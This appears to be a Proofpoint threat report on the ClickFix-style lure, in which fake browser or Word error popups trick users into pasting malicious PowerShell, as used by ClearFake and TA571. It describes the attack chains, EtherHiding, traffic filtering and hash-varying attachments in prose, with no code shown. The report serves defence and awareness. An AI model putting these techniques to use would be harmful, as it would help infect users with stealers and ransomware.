Proofpoint has observed an increase in a technique leveraging unique social engineering that directs users to copy and paste malicious PowerShell scripts to infect their computers with malware. Threat actors including initial access broker TA571 and at least one fake update activity set are using this method to deliver malware.
Whether the initial campaign begins via malspam or delivered via web browser injects, the technique is similar. Users are shown a popup textbox that suggests an error occurred when trying to open the document or webpage, and instructions are provided to copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box to eventually run the script via PowerShell.
Proofpoint has observed this technique as early as 1 March 2024 by TA571, and in early April by the ClearFake cluster, as well as in early June by both clusters.
ClearFake
ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.
In observed campaigns, when a user visited a compromised website, the injection caused the website to load a malicious script hosted on the blockchain via Binance’s Smart Chain contracts, a technique known as “EtherHiding“. The initial script then loaded a second script from a domain that used Keitaro TDS for filtering. If this second script loaded and passed various checks, and if the victim continued to browse the website, they were presented with a fake warning overlay on the compromised website. This warning instructed them to install a “root certificate” to view the website correctly.
ClickFix
In mid-April 2024, researchers found compromised sites containing an inject leading to an iframe on pley[.]es. This iframe was shown as an overlay error message claiming that a faulty browser update needed to be fixed. Researchers dubbed this activity cluster ClickFix.
The error message asked the victim to open “Windows PowerShell (Admin)” (which will open an UAC prompt) and then right-click to paste the code. If this was done, PowerShell would run another remote PowerShell script that would download and run an executable, eventually leading to Vidar Stealer. However, just a few days later, after discovery, the payload domain used in the PowerShell was taken offline. Thus, despite the error being displayed on compromised websites, it could not lead to an infection.
TA571
Proofpoint first observed TA571’s use of this technique in a campaign on 01 March 2024. The campaign included over 100,000 messages and targeted thousands of organisations globally.
In this campaign, emails contained an HTML attachment that displayed a page resembling Microsoft Word. The page also displayed an error message that said the “‘Word Online’ extension is not installed,” and presented two options to continue: “How to fix” and “Auto-fix”.
Proofpoint observed TA571 use similar attack chains in campaigns throughout the spring, using various visual lures and varying between instructing the victim to either open the PowerShell terminal or using the Run dialogue box by pressing the Windows button+R. The actor also removed wording that refers to copy/paste, abusing the fact that the victim doesn’t need to know that something is copied to the clipboard. Some recent examples:
In most of the campaigns, TA571 also padded the HTML files with various random content, creating semi-unique hashes for the attachments.
Attribution
TA571 is a spam distributor, and this actor sends high volume email campaigns to deliver and install a variety malware for their cybercriminal customers, depending on the subsequent operator’s objectives. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.
ClearFake is not currently attributed to a tracked threat actor.
While it’s clear that both actors are borrowing ideas from each other, Proofpoint does not associate them with each other in any other way.
Conclusion
This attack chain requires significant user interaction to be successful. The social engineering in the fake error messages is clever and purports to be an authoritative notification coming from the operating system. It also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk. The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains – including improving social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable malware delivery.
Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training programme.
